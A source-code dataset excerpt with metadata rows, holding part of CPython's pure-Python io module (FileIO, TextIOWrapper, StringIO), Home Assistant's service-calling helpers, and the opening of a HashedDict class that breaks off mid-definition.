if sum(c in 'rwax' for c in mode) != 1 or mode.count('+') > 1:
raise ValueError('Must have exactly one of create/read/write/append '
'mode and at most one plus')
if 'x' in mode:
self._created = True
self._writable = True
flags = os.O_EXCL | os.O_CREAT
elif 'r' in mode:
self._readable = True
flags = 0
elif 'w' in mode:
self._writable = True
flags = os.O_CREAT | os.O_TRUNC
elif 'a' in mode:
self._writable = True
self._appending = True
flags = os.O_APPEND | os.O_CREAT
if '+' in mode:
self._readable = True
self._writable = True
if self._readable and self._writable:
flags |= os.O_RDWR
elif self._readable:
flags |= os.O_RDONLY
else:
flags |= os.O_WRONLY
flags |= getattr(os, 'O_BINARY', 0)
noinherit_flag = (getattr(os, 'O_NOINHERIT', 0) or
getattr(os, 'O_CLOEXEC', 0))
flags |= noinherit_flag
owned_fd = None
try:
if fd < 0:
if not closefd:
raise ValueError('Cannot use closefd=False with file name')
if opener is None:
fd = os.open(file, flags, 0o666)
else:
fd = opener(file, flags)
if not isinstance(fd, int):
raise TypeError('expected integer from opener')
if fd < 0:
raise OSError('Negative file descriptor')
owned_fd = fd
if not noinherit_flag:
os.set_inheritable(fd, False)
self._closefd = closefd
fdfstat = os.fstat(fd)
try:
if stat.S_ISDIR(fdfstat.st_mode):
raise IsADirectoryError(errno.EISDIR,
os.strerror(errno.EISDIR), file)
except AttributeError:
# Ignore the AttribueError if stat.S_ISDIR or errno.EISDIR
# don't exist.
pass
self._blksize = getattr(fdfstat, 'st_blksize', 0)
if self._blksize <= 1:
self._blksize = DEFAULT_BUFFER_SIZE
if _setmode:
# don't translate newlines (\r\n <=> \n)
_setmode(fd, os.O_BINARY)
self.name = file
if self._appending:
# For consistent behaviour, we explicitly seek to the
# end of file (otherwise, it might be done only on the
# first write()).
os.lseek(fd, 0, SEEK_END)
except:
if owned_fd is not None:
os.close(owned_fd)
raise
self._fd = fd
def __del__(self):
if self._fd >= 0 and self._closefd and not self.closed:
import warnings
warnings.warn('unclosed file %r' % (self,), ResourceWarning,
stacklevel=2, source=self)
self.close()
def __getstate__(self):
raise TypeError(f"cannot pickle {self.__class__.__name__!r} object")
def __repr__(self):
class_name = '%s.%s' % (self.__class__.__module__,
self.__class__.__qualname__)
if self.closed:
return '<%s [closed]>' % class_name
try:
name = self.name
except AttributeError:
return ('<%s fd=%d mode=%r closefd=%r>' %
(class_name, self._fd, self.mode, self._closefd))
else:
return ('<%s name=%r mode=%r closefd=%r>' %
(class_name, name, self.mode, self._closefd))
def _checkReadable(self):
if not self._readable:
raise UnsupportedOperation('File not open for reading')
def _checkWritable(self, msg=None):
if not self._writable:
raise UnsupportedOperation('File not open for writing')
def read(self, size=None):
"""Read at most size bytes, returned as bytes.
Only makes one system call, so less data may be returned than requested
In non-blocking mode, returns None if no data is available.
Return an empty bytes object at EOF.
"""
self._checkClosed()
self._checkReadable()
if size is None or size < 0:
return self.readall()
try:
return os.read(self._fd, size)
except BlockingIOError:
return None
def readall(self):
"""Read all data from the file, returned as bytes.
In non-blocking mode, returns as much as is immediately available,
or None if no data is available. Return an empty bytes object at EOF.
"""
self._checkClosed()
self._checkReadable()
bufsize = DEFAULT_BUFFER_SIZE
try:
pos = os.lseek(self._fd, 0, SEEK_CUR)
end = os.fstat(self._fd).st_size
if end >= pos:
bufsize = end - pos + 1
except OSError:
pass
result = bytearray()
while True:
if len(result) >= bufsize:
bufsize = len(result)
bufsize += max(bufsize, DEFAULT_BUFFER_SIZE)
n = bufsize - len(result)
try:
chunk = os.read(self._fd, n)
except BlockingIOError:
if result:
break
return None
if not chunk: # reached the end of the file
break
result += chunk
return bytes(result)
def readinto(self, b):
"""Same as RawIOBase.readinto()."""
m = memoryview(b).cast('B')
data = self.read(len(m))
n = len(data)
m[:n] = data
return n
def write(self, b):
"""Write bytes b to file, return number written.
Only makes one system call, so not all of the data may be written.
The number of bytes actually written is returned. In non-blocking mode,
returns None if the write would block.
"""
self._checkClosed()
self._checkWritable()
try:
return os.write(self._fd, b)
except BlockingIOError:
return None
def seek(self, pos, whence=SEEK_SET):
"""Move to new file position.
Argument offset is a byte count. Optional argument whence defaults to
SEEK_SET or 0 (offset from start of file, offset should be >= 0); other values
are SEEK_CUR or 1 (move relative to current position, positive or negative),
and SEEK_END or 2 (move relative to end of file, usually negative, although
many platforms allow seeking beyond the end of a file).
Note that not all file objects are seekable.
"""
if isinstance(pos, float):
raise TypeError('an integer is required')
self._checkClosed()
return os.lseek(self._fd, pos, whence)
def tell(self):
"""tell() -> int. Current file position.
Can raise OSError for non seekable files."""
self._checkClosed()
return os.lseek(self._fd, 0, SEEK_CUR)
def truncate(self, size=None):
"""Truncate the file to at most size bytes.
Size defaults to the current file position, as returned by tell().
The current file position is changed to the value of size.
"""
self._checkClosed()
self._checkWritable()
if size is None:
size = self.tell()
os.ftruncate(self._fd, size)
return size
def close(self):
"""Close the file.
A closed file cannot be used for further I/O operations. close() may be
called more than once without error.
"""
if not self.closed:
try:
if self._closefd:
os.close(self._fd)
finally:
super().close()
def seekable(self):
"""True if file supports random-access."""
self._checkClosed()
if self._seekable is None:
try:
self.tell()
except OSError:
self._seekable = False
else:
self._seekable = True
return self._seekable
def readable(self):
"""True if file was opened in a read mode."""
self._checkClosed()
return self._readable
def writable(self):
"""True if file was opened in a write mode."""
self._checkClosed()
return self._writable
def fileno(self):
"""Return the underlying file descriptor (an integer)."""
self._checkClosed()
return self._fd
def isatty(self):
"""True if the file is connected to a TTY device."""
self._checkClosed()
return os.isatty(self._fd)
@property
def closefd(self):
"""True if the file descriptor will be closed by close()."""
return self._closefd
@property
def mode(self):
"""String giving the file mode"""
if self._created:
if self._readable:
return 'xb+'
else:
return 'xb'
elif self._appending:
if self._readable:
return 'ab+'
else:
return 'ab'
elif self._readable:
if self._writable:
return 'rb+'
else:
return 'rb'
else:
return 'wb'
class TextIOBase(IOBase):
"""Base class for text I/O.
This class provides a character and line based interface to stream
I/O. There is no public constructor.
"""
def read(self, size=-1):
"""Read at most size characters from stream, where size is an int.
Read from underlying buffer until we have size characters or we hit EOF.
If size is negative or omitted, read until EOF.
Returns a string.
"""
self._unsupported("read")
def write(self, s):
"""Write string s to stream and returning an int."""
self._unsupported("write")
def truncate(self, pos=None):
"""Truncate size to pos, where pos is an int."""
self._unsupported("truncate")
def readline(self):
"""Read until newline or EOF.
Returns an empty string if EOF is hit immediately.
"""
self._unsupported("readline")
def detach(self):
"""
Separate the underlying buffer from the TextIOBase and return it.
After the underlying buffer has been detached, the TextIO is in an
unusable state.
"""
self._unsupported("detach")
@property
def encoding(self):
"""Subclasses should override."""
return None
@property
def newlines(self):
"""Line endings translated so far.
Only line endings translated during reading are considered.
Subclasses should override.
"""
return None
@property
def errors(self):
"""Error setting of the decoder or encoder.
Subclasses should override."""
return None
io.TextIOBase.register(TextIOBase)
class IncrementalNewlineDecoder(codecs.IncrementalDecoder):
r"""Codec used when reading a file in universal newlines mode. It wraps
another incremental decoder, translating \r\n and \r into \n. It also
records the types of newlines encountered. When used with
translate=False, it ensures that the newline sequence is returned in
one piece.
"""
def __init__(self, decoder, translate, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors=errors)
self.translate = translate
self.decoder = decoder
self.seennl = 0
self.pendingcr = False
def decode(self, input, final=False):
# decode input (with the eventual \r from a previous pass)
if self.decoder is None:
output = input
else:
output = self.decoder.decode(input, final=final)
if self.pendingcr and (output or final):
output = "\r" + output
self.pendingcr = False
# retain last \r even when not translating data:
# then readline() is sure to get \r\n in one pass
if output.endswith("\r") and not final:
output = output[:-1]
self.pendingcr = True
# Record which newlines are read
crlf = output.count('\r\n')
cr = output.count('\r') - crlf
lf = output.count('\n') - crlf
self.seennl |= (lf and self._LF) | (cr and self._CR) \
| (crlf and self._CRLF)
if self.translate:
if crlf:
output = output.replace("\r\n", "\n")
if cr:
output = output.replace("\r", "\n")
return output
def getstate(self):
if self.decoder is None:
buf = b""
flag = 0
else:
buf, flag = self.decoder.getstate()
flag <<= 1
if self.pendingcr:
flag |= 1
return buf, flag
def setstate(self, state):
buf, flag = state
self.pendingcr = bool(flag & 1)
if self.decoder is not None:
self.decoder.setstate((buf, flag >> 1))
def reset(self):
self.seennl = 0
self.pendingcr = False
if self.decoder is not None:
self.decoder.reset()
_LF = 1
_CR = 2
_CRLF = 4
@property
def newlines(self):
return (None,
"\n",
"\r",
("\r", "\n"),
"\r\n",
("\n", "\r\n"),
("\r", "\r\n"),
("\r", "\n", "\r\n")
)[self.seennl]
class TextIOWrapper(TextIOBase):
r"""Character and line based layer over a BufferedIOBase object, buffer.
encoding gives the name of the encoding that the stream will be
decoded or encoded with. It defaults to locale.getpreferredencoding(False).
errors determines the strictness of encoding and decoding (see the
codecs.register) and defaults to "strict".
newline can be None, '', '\n', '\r', or '\r\n'. It controls the
handling of line endings. If it is None, universal newlines is
enabled. With this enabled, on input, the lines endings '\n', '\r',
or '\r\n' are translated to '\n' before being returned to the
caller. Conversely, on output, '\n' is translated to the system
default line separator, os.linesep. If newline is any other of its
legal values, that newline becomes the newline when the file is read
and it is returned untranslated. On output, '\n' is converted to the
newline.
If line_buffering is True, a call to flush is implied when a call to
write contains a newline character.
"""
_CHUNK_SIZE = 2048
# Initialize _buffer as soon as possible since it's used by __del__()
# which calls close()
_buffer = None
# The write_through argument has no effect here since this
# implementation always writes through. The argument is present only
# so that the signature can match the signature of the C version.
def __init__(self, buffer, encoding=None, errors=None, newline=None,
line_buffering=False, write_through=False):
self._check_newline(newline)
if encoding is None:
try:
encoding = os.device_encoding(buffer.fileno())
except (AttributeError, UnsupportedOperation):
pass
if encoding is None:
try:
import locale
except ImportError:
# Importing locale may fail if Python is being built
encoding = "ascii"
else:
encoding = locale.getpreferredencoding(False)
if not isinstance(encoding, str):
raise ValueError("invalid encoding: %r" % encoding)
if not codecs.lookup(encoding)._is_text_encoding:
msg = ("%r is not a text encoding; "
"use codecs.open() to handle arbitrary codecs")
raise LookupError(msg % encoding)
if errors is None:
errors = "strict"
else:
if not isinstance(errors, str):
raise ValueError("invalid errors: %r" % errors)
self._buffer = buffer
self._decoded_chars = '' # buffer for text returned from decoder
self._decoded_chars_used = 0 # offset into _decoded_chars for read()
self._snapshot = None # info for reconstructing decoder state
self._seekable = self._telling = self.buffer.seekable()
self._has_read1 = hasattr(self.buffer, 'read1')
self._configure(encoding, errors, newline,
line_buffering, write_through)
def _check_newline(self, newline):
if newline is not None and not isinstance(newline, str):
raise TypeError("illegal newline type: %r" % (type(newline),))
if newline not in (None, "", "\n", "\r", "\r\n"):
raise ValueError("illegal newline value: %r" % (newline,))
def _configure(self, encoding=None, errors=None, newline=None,
line_buffering=False, write_through=False):
self._encoding = encoding
self._errors = errors
self._encoder = None
self._decoder = None
self._b2cratio = 0.0
self._readuniversal = not newline
self._readtranslate = newline is None
self._readnl = newline
self._writetranslate = newline != ''
self._writenl = newline or os.linesep
self._line_buffering = line_buffering
self._write_through = write_through
# don't write a BOM in the middle of a file
if self._seekable and self.writable():
position = self.buffer.tell()
if position != 0:
try:
self._get_encoder().setstate(0)
except LookupError:
# Sometimes the encoder doesn't exist
pass
# self._snapshot is either None, or a tuple (dec_flags, next_input)
# where dec_flags is the second (integer) item of the decoder state
# and next_input is the chunk of input bytes that comes next after the
# snapshot point. We use this to reconstruct decoder states in tell().
# Naming convention:
# - "bytes_..." for integer variables that count input bytes
# - "chars_..." for integer variables that count decoded characters
def __repr__(self):
result = "<{}.{}".format(self.__class__.__module__,
self.__class__.__qualname__)
try:
name = self.name
except AttributeError:
pass
else:
result += " name={0!r}".format(name)
try:
mode = self.mode
except AttributeError:
pass
else:
result += " mode={0!r}".format(mode)
return result + " encoding={0!r}>".format(self.encoding)
@property
def encoding(self):
return self._encoding
@property
def errors(self):
return self._errors
@property
def line_buffering(self):
return self._line_buffering
@property
def write_through(self):
return self._write_through
@property
def buffer(self):
return self._buffer
def reconfigure(self, *,
encoding=None, errors=None, newline=Ellipsis,
line_buffering=None, write_through=None):
"""Reconfigure the text stream with new parameters.
This also flushes the stream.
"""
if (self._decoder is not None
and (encoding is not None or errors is not None
or newline is not Ellipsis)):
raise UnsupportedOperation(
"It is not possible to set the encoding or newline of stream "
"after the first read")
if errors is None:
if encoding is None:
errors = self._errors
else:
errors = 'strict'
elif not isinstance(errors, str):
raise TypeError("invalid errors: %r" % errors)
if encoding is None:
encoding = self._encoding
else:
if not isinstance(encoding, str):
raise TypeError("invalid encoding: %r" % encoding)
if newline is Ellipsis:
newline = self._readnl
self._check_newline(newline)
if line_buffering is None:
line_buffering = self.line_buffering
if write_through is None:
write_through = self.write_through
self.flush()
self._configure(encoding, errors, newline,
line_buffering, write_through)
def seekable(self):
if self.closed:
raise ValueError("I/O operation on closed file.")
return self._seekable
def readable(self):
return self.buffer.readable()
def writable(self):
return self.buffer.writable()
def flush(self):
self.buffer.flush()
self._telling = self._seekable
def close(self):
if self.buffer is not None and not self.closed:
try:
self.flush()
finally:
self.buffer.close()
@property
def closed(self):
return self.buffer.closed
@property
def name(self):
return self.buffer.name
def fileno(self):
return self.buffer.fileno()
def isatty(self):
return self.buffer.isatty()
def write(self, s):
'Write data, where s is a str'
if self.closed:
raise ValueError("write to closed file")
if not isinstance(s, str):
raise TypeError("can't write %s to text stream" %
s.__class__.__name__)
length = len(s)
haslf = (self._writetranslate or self._line_buffering) and "\n" in s
if haslf and self._writetranslate and self._writenl != "\n":
s = s.replace("\n", self._writenl)
encoder = self._encoder or self._get_encoder()
# XXX What if we were just reading?
b = encoder.encode(s)
self.buffer.write(b)
if self._line_buffering and (haslf or "\r" in s):
self.flush()
self._set_decoded_chars('')
self._snapshot = None
if self._decoder:
self._decoder.reset()
return length
def _get_encoder(self):
make_encoder = codecs.getincrementalencoder(self._encoding)
self._encoder = make_encoder(self._errors)
return self._encoder
def _get_decoder(self):
make_decoder = codecs.getincrementaldecoder(self._encoding)
decoder = make_decoder(self._errors)
if self._readuniversal:
decoder = IncrementalNewlineDecoder(decoder, self._readtranslate)
self._decoder = decoder
return decoder
# The following three methods implement an ADT for _decoded_chars.
# Text returned from the decoder is buffered here until the client
# requests it by calling our read() or readline() method.
def _set_decoded_chars(self, chars):
"""Set the _decoded_chars buffer."""
self._decoded_chars = chars
self._decoded_chars_used = 0
def _get_decoded_chars(self, n=None):
"""Advance into the _decoded_chars buffer."""
offset = self._decoded_chars_used
if n is None:
chars = self._decoded_chars[offset:]
else:
chars = self._decoded_chars[offset:offset + n]
self._decoded_chars_used += len(chars)
return chars
def _rewind_decoded_chars(self, n):
"""Rewind the _decoded_chars buffer."""
if self._decoded_chars_used < n:
raise AssertionError("rewind decoded_chars out of bounds")
self._decoded_chars_used -= n
def _read_chunk(self):
"""
Read and decode the next chunk of data from the BufferedReader.
"""
# The return value is True unless EOF was reached. The decoded
# string is placed in self._decoded_chars (replacing its previous
# value). The entire input chunk is sent to the decoder, though
# some of it may remain buffered in the decoder, yet to be
# converted.
if self._decoder is None:
raise ValueError("no decoder")
if self._telling:
# To prepare for tell(), we need to snapshot a point in the
# file where the decoder's input buffer is empty.
dec_buffer, dec_flags = self._decoder.getstate()
# Given this, we know there was a valid snapshot point
# len(dec_buffer) bytes ago with decoder state (b'', dec_flags).
# Read a chunk, decode it, and put the result in self._decoded_chars.
if self._has_read1:
input_chunk = self.buffer.read1(self._CHUNK_SIZE)
else:
input_chunk = self.buffer.read(self._CHUNK_SIZE)
eof = not input_chunk
decoded_chars = self._decoder.decode(input_chunk, eof)
self._set_decoded_chars(decoded_chars)
if decoded_chars:
self._b2cratio = len(input_chunk) / len(self._decoded_chars)
else:
self._b2cratio = 0.0
if self._telling:
# At the snapshot point, len(dec_buffer) bytes before the read,
# the next input to be decoded is dec_buffer + input_chunk.
self._snapshot = (dec_flags, dec_buffer + input_chunk)
return not eof
def _pack_cookie(self, position, dec_flags=0,
bytes_to_feed=0, need_eof=0, chars_to_skip=0):
# The meaning of a tell() cookie is: seek to position, set the
# decoder flags to dec_flags, read bytes_to_feed bytes, feed them
# into the decoder with need_eof as the EOF flag, then skip
# chars_to_skip characters of the decoded result. For most simple
# decoders, tell() will often just give a byte offset in the file.
return (position | (dec_flags<<64) | (bytes_to_feed<<128) |
(chars_to_skip<<192) | bool(need_eof)<<256)
def _unpack_cookie(self, bigint):
rest, position = divmod(bigint, 1<<64)
rest, dec_flags = divmod(rest, 1<<64)
rest, bytes_to_feed = divmod(rest, 1<<64)
need_eof, chars_to_skip = divmod(rest, 1<<64)
return position, dec_flags, bytes_to_feed, need_eof, chars_to_skip
def tell(self):
if not self._seekable:
raise UnsupportedOperation("underlying stream is not seekable")
if not self._telling:
raise OSError("telling position disabled by next() call")
self.flush()
position = self.buffer.tell()
decoder = self._decoder
if decoder is None or self._snapshot is None:
if self._decoded_chars:
# This should never happen.
raise AssertionError("pending decoded text")
return position
# Skip backward to the snapshot point (see _read_chunk).
dec_flags, next_input = self._snapshot
position -= len(next_input)
# How many decoded characters have been used up since the snapshot?
chars_to_skip = self._decoded_chars_used
if chars_to_skip == 0:
# We haven't moved from the snapshot point.
return self._pack_cookie(position, dec_flags)
# Starting from the snapshot position, we will walk the decoder
# forward until it gives us enough decoded characters.
saved_state = decoder.getstate()
try:
# Fast search for an acceptable start point, close to our
# current pos.
# Rationale: calling decoder.decode() has a large overhead
# regardless of chunk size; we want the number of such calls to
# be O(1) in most situations (common decoders, sensible input).
# Actually, it will be exactly 1 for fixed-size codecs (all
# 8-bit codecs, also UTF-16 and UTF-32).
skip_bytes = int(self._b2cratio * chars_to_skip)
skip_back = 1
assert skip_bytes <= len(next_input)
while skip_bytes > 0:
decoder.setstate((b'', dec_flags))
# Decode up to temptative start point
n = len(decoder.decode(next_input[:skip_bytes]))
if n <= chars_to_skip:
b, d = decoder.getstate()
if not b:
# Before pos and no bytes buffered in decoder => OK
dec_flags = d
chars_to_skip -= n
break
# Skip back by buffered amount and reset heuristic
skip_bytes -= len(b)
skip_back = 1
else:
# We're too far ahead, skip back a bit
skip_bytes -= skip_back
skip_back = skip_back * 2
else:
skip_bytes = 0
decoder.setstate((b'', dec_flags))
# Note our initial start point.
start_pos = position + skip_bytes
start_flags = dec_flags
if chars_to_skip == 0:
# We haven't moved from the start point.
return self._pack_cookie(start_pos, start_flags)
# Feed the decoder one byte at a time. As we go, note the
# nearest "safe start point" before the current location
# (a point where the decoder has nothing buffered, so seek()
# can safely start from there and advance to this location).
bytes_fed = 0
need_eof = 0
# Chars decoded since `start_pos`
chars_decoded = 0
for i in range(skip_bytes, len(next_input)):
bytes_fed += 1
chars_decoded += len(decoder.decode(next_input[i:i+1]))
dec_buffer, dec_flags = decoder.getstate()
if not dec_buffer and chars_decoded <= chars_to_skip:
# Decoder buffer is empty, so this is a safe start point.
start_pos += bytes_fed
chars_to_skip -= chars_decoded
start_flags, bytes_fed, chars_decoded = dec_flags, 0, 0
if chars_decoded >= chars_to_skip:
break
else:
# We didn't get enough decoded data; signal EOF to get more.
chars_decoded += len(decoder.decode(b'', final=True))
need_eof = 1
if chars_decoded < chars_to_skip:
raise OSError("can't reconstruct logical file position")
# The returned cookie corresponds to the last safe start point.
return self._pack_cookie(
start_pos, start_flags, bytes_fed, need_eof, chars_to_skip)
finally:
decoder.setstate(saved_state)
def truncate(self, pos=None):
self.flush()
if pos is None:
pos = self.tell()
return self.buffer.truncate(pos)
def detach(self):
if self.buffer is None:
raise ValueError("buffer is already detached")
self.flush()
buffer = self._buffer
self._buffer = None
return buffer
def seek(self, cookie, whence=0):
def _reset_encoder(position):
"""Reset the encoder (merely useful for proper BOM handling)"""
try:
encoder = self._encoder or self._get_encoder()
except LookupError:
# Sometimes the encoder doesn't exist
pass
else:
if position != 0:
encoder.setstate(0)
else:
encoder.reset()
if self.closed:
raise ValueError("tell on closed file")
if not self._seekable:
raise UnsupportedOperation("underlying stream is not seekable")
if whence == SEEK_CUR:
if cookie != 0:
raise UnsupportedOperation("can't do nonzero cur-relative seeks")
# Seeking to the current position should attempt to
# sync the underlying buffer with the current position.
whence = 0
cookie = self.tell()
elif whence == SEEK_END:
if cookie != 0:
raise UnsupportedOperation("can't do nonzero end-relative seeks")
self.flush()
position = self.buffer.seek(0, whence)
self._set_decoded_chars('')
self._snapshot = None
if self._decoder:
self._decoder.reset()
_reset_encoder(position)
return position
if whence != 0:
raise ValueError("unsupported whence (%r)" % (whence,))
if cookie < 0:
raise ValueError("negative seek position %r" % (cookie,))
self.flush()
# The strategy of seek() is to go back to the safe start point
# and replay the effect of read(chars_to_skip) from there.
start_pos, dec_flags, bytes_to_feed, need_eof, chars_to_skip = \
self._unpack_cookie(cookie)
# Seek back to the safe start point.
self.buffer.seek(start_pos)
self._set_decoded_chars('')
self._snapshot = None
# Restore the decoder to its state from the safe start point.
if cookie == 0 and self._decoder:
self._decoder.reset()
elif self._decoder or dec_flags or chars_to_skip:
self._decoder = self._decoder or self._get_decoder()
self._decoder.setstate((b'', dec_flags))
self._snapshot = (dec_flags, b'')
if chars_to_skip:
# Just like _read_chunk, feed the decoder and save a snapshot.
input_chunk = self.buffer.read(bytes_to_feed)
self._set_decoded_chars(
self._decoder.decode(input_chunk, need_eof))
self._snapshot = (dec_flags, input_chunk)
# Skip chars_to_skip of the decoded characters.
if len(self._decoded_chars) < chars_to_skip:
raise OSError("can't restore logical file position")
self._decoded_chars_used = chars_to_skip
_reset_encoder(cookie)
return cookie
def read(self, size=None):
self._checkReadable()
if size is None:
size = -1
else:
try:
size_index = size.__index__
except AttributeError:
raise TypeError(f"{size!r} is not an integer")
else:
size = size_index()
decoder = self._decoder or self._get_decoder()
if size < 0:
# Read everything.
result = (self._get_decoded_chars() +
decoder.decode(self.buffer.read(), final=True))
self._set_decoded_chars('')
self._snapshot = None
return result
else:
# Keep reading chunks until we have size characters to return.
eof = False
result = self._get_decoded_chars(size)
while len(result) < size and not eof:
eof = not self._read_chunk()
result += self._get_decoded_chars(size - len(result))
return result
def __next__(self):
self._telling = False
line = self.readline()
if not line:
self._snapshot = None
self._telling = self._seekable
raise StopIteration
return line
def readline(self, size=None):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
else:
try:
size_index = size.__index__
except AttributeError:
raise TypeError(f"{size!r} is not an integer")
else:
size = size_index()
# Grab all the decoded text (we will rewind any extra bits later).
line = self._get_decoded_chars()
start = 0
# Make the decoder if it doesn't already exist.
if not self._decoder:
self._get_decoder()
pos = endpos = None
while True:
if self._readtranslate:
# Newlines are already translated, only search for \n
pos = line.find('\n', start)
if pos >= 0:
endpos = pos + 1
break
else:
start = len(line)
elif self._readuniversal:
# Universal newline search. Find any of \r, \r\n, \n
# The decoder ensures that \r\n are not split in two pieces
# In C we'd look for these in parallel of course.
nlpos = line.find("\n", start)
crpos = line.find("\r", start)
if crpos == -1:
if nlpos == -1:
# Nothing found
start = len(line)
else:
# Found \n
endpos = nlpos + 1
break
elif nlpos == -1:
# Found lone \r
endpos = crpos + 1
break
elif nlpos < crpos:
# Found \n
endpos = nlpos + 1
break
elif nlpos == crpos + 1:
# Found \r\n
endpos = crpos + 2
break
else:
# Found \r
endpos = crpos + 1
break
else:
# non-universal
pos = line.find(self._readnl)
if pos >= 0:
endpos = pos + len(self._readnl)
break
if size >= 0 and len(line) >= size:
endpos = size # reached length size
break
# No line ending seen yet - get more data'
while self._read_chunk():
if self._decoded_chars:
break
if self._decoded_chars:
line += self._get_decoded_chars()
else:
# end of file
self._set_decoded_chars('')
self._snapshot = None
return line
if size >= 0 and endpos > size:
endpos = size # don't exceed size
# Rewind _decoded_chars to just after the line ending we found.
self._rewind_decoded_chars(len(line) - endpos)
return line[:endpos]
@property
def newlines(self):
return self._decoder.newlines if self._decoder else None
class StringIO(TextIOWrapper):
"""Text I/O implementation using an in-memory buffer.
The initial_value argument sets the value of object. The newline
argument is like the one of TextIOWrapper's constructor.
"""
def __init__(self, initial_value="", newline="\n"):
super(StringIO, self).__init__(BytesIO(),
encoding="utf-8",
errors="surrogatepass",
newline=newline)
# Issue #5645: make universal newlines semantics the same as in the
# C version, even under Windows.
if newline is None:
self._writetranslate = False
if initial_value is not None:
if not isinstance(initial_value, str):
raise TypeError("initial_value must be str or None, not {0}"
.format(type(initial_value).__name__))
self.write(initial_value)
self.seek(0)
def getvalue(self):
self.flush()
decoder = self._decoder or self._get_decoder()
old_state = decoder.getstate()
decoder.reset()
try:
return decoder.decode(self.buffer.getvalue(), final=True)
finally:
decoder.setstate(old_state)
def __repr__(self):
# TextIOWrapper tells the encoding in its repr. In StringIO,
# that's an implementation detail.
return object.__repr__(self)
@property
def errors(self):
return None
@property
def encoding(self):
return None
def detach(self):
# This doesn't make sense on StringIO.
self._unsupported("detach")
| apache-2.0 | 3,254,690,779,113,176,000 | 33.70235 | 86 | 0.567581 | false |
jawilson/home-assistant | homeassistant/helpers/service.py | 1 | 3578 | """Service calling related helpers."""
import functools
import logging
# pylint: disable=unused-import
from typing import Optional # NOQA
import voluptuous as vol
from homeassistant.const import ATTR_ENTITY_ID
from homeassistant.core import HomeAssistant # NOQA
from homeassistant.exceptions import TemplateError
from homeassistant.loader import get_component
import homeassistant.helpers.config_validation as cv
HASS = None # type: Optional[HomeAssistant]
CONF_SERVICE = 'service'
CONF_SERVICE_TEMPLATE = 'service_template'
CONF_SERVICE_ENTITY_ID = 'entity_id'
CONF_SERVICE_DATA = 'data'
CONF_SERVICE_DATA_TEMPLATE = 'data_template'
_LOGGER = logging.getLogger(__name__)
def service(domain, service_name):
"""Decorator factory to register a service."""
def register_service_decorator(action):
"""Decorator to register a service."""
HASS.services.register(domain, service_name,
functools.partial(action, HASS))
return action
return register_service_decorator
def call_from_config(hass, config, blocking=False, variables=None,
validate_config=True):
"""Call a service based on a config hash."""
if validate_config:
try:
config = cv.SERVICE_SCHEMA(config)
except vol.Invalid as ex:
_LOGGER.error("Invalid config for calling service: %s", ex)
return
if CONF_SERVICE in config:
domain_service = config[CONF_SERVICE]
else:
try:
config[CONF_SERVICE_TEMPLATE].hass = hass
domain_service = config[CONF_SERVICE_TEMPLATE].render(variables)
domain_service = cv.service(domain_service)
except TemplateError as ex:
_LOGGER.error('Error rendering service name template: %s', ex)
return
except vol.Invalid as ex:
_LOGGER.error('Template rendered invalid service: %s',
domain_service)
return
domain, service_name = domain_service.split('.', 1)
service_data = dict(config.get(CONF_SERVICE_DATA, {}))
def _data_template_creator(value):
"""Recursive template creator helper function."""
if isinstance(value, list):
for idx, element in enumerate(value):
value[idx] = _data_template_creator(element)
return value
if isinstance(value, dict):
for key, element in value.items():
value[key] = _data_template_creator(element)
return value
value.hass = hass
return value.render(variables)
if CONF_SERVICE_DATA_TEMPLATE in config:
for key, value in config[CONF_SERVICE_DATA_TEMPLATE].items():
service_data[key] = _data_template_creator(value)
if CONF_SERVICE_ENTITY_ID in config:
service_data[ATTR_ENTITY_ID] = config[CONF_SERVICE_ENTITY_ID]
hass.services.call(domain, service_name, service_data, blocking)
def extract_entity_ids(hass, service_call):
"""Helper method to extract a list of entity ids from a service call.
Will convert group entity ids to the entity ids it represents.
"""
if not (service_call.data and ATTR_ENTITY_ID in service_call.data):
return []
group = get_component('group')
# Entity ID attr can be a list or a string
service_ent_id = service_call.data[ATTR_ENTITY_ID]
if isinstance(service_ent_id, str):
return group.expand_entity_ids(hass, [service_ent_id])
return [ent_id for ent_id in group.expand_entity_ids(hass, service_ent_id)]
| mit | -4,978,868,469,255,821,000 | 33.403846 | 79 | 0.655115 | false |
JoEiner/hasheddict | hasheddict/__init__.py | 1 | 10088 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
from zlib import crc32
from hashlib import sha256
from math import log, ceil
import collections
import threading
__all__ = ['HashedDict']
__version__ = "0.1.0"
__author__ = "Johannes Schreiner, [email protected]"
__credits__ = ["Johannes Schreiner"]
__url__ = "https://github.com/JoEiner/hasheddict"
__copyright__ = "(c) 2015 Johannes Schreiner"
__license__ = "GNU General Public License v3 or later (GPLv3+)"
class HashedDict(dict):
"""
A dictionary that provides cryptographic hashes of its contents.
See package documentation for usage instructions.
"""
def __init__(self, *args, **kwargs):
"""
Possible ways of instantiation:
HashedDict([algorithm[, trees_cache_size], ])
HashedDict([algorithm[, trees_cache_size], ]**kwargs)
HashedDict([algorithm[, trees_cache_size], ]iterable, **kwargs)
HashedDict([algorithm[, trees_cache_size], ]mapping, **kwargs)
@param algorithm: algorithm is a class that provides an interface
similar to hashlib.sha*() interface (see Lib/hashlib.py)
@type trees_cache_size: int
@param trees_cache_size: The number of internal trees the HashedDict buffers.
Raising this number increases memory usage, yet reduces
time consumption when the dictionary grows over its boundaries
Use only positive integers.
Examples::
>>> a = dict(one=1, two=2, three=3)
>>> b = dict(zip(['one', 'two', 'three'], [1, 2, 3]))
>>> c = dict([('two', 2), ('one', 1), ('three', 3)])
>>> d = dict({'three': 3, 'one': 1, 'two': 2})
>>> from hashlib import md5, sha512
>>> e = dict(md5, one=1, two=2, three=3)
>>> f = dict(1, sha512, zip(range(100000), reversed(range(100000))))
"""
dictargs = [arg for arg in args if isinstance(arg, collections.Iterable) or
isinstance(arg, collections.Mapping)]
if len(dictargs) > 1:
raise TypeError("HashedDict expected at most 1 iterable or mapping "
"argument, got %d" % len(args))
hashargs = [arg for arg in args if not isinstance(arg, collections.Iterable) and
not isinstance(arg, collections.Mapping)]
self.__hashalg = args[0] if len(hashargs) >= 1 else sha256
self.__trees_cache_size = args[1] if len(hashargs) >= 2 else 3
self.__key_to_hash = dict()
depth = self.__get_depth_for_length(0)
initial_tree = HashTree(self.__key_to_hash, self.__hashalg, depth)
initial_tree.start()
initial_tree.join()
self.__trees = {depth: initial_tree}
self.update(*dictargs, **kwargs)
def get_hash(self):
tree_nr = self.__get_depth_for_length(len(self))
return self.__trees[tree_nr].get_hash()
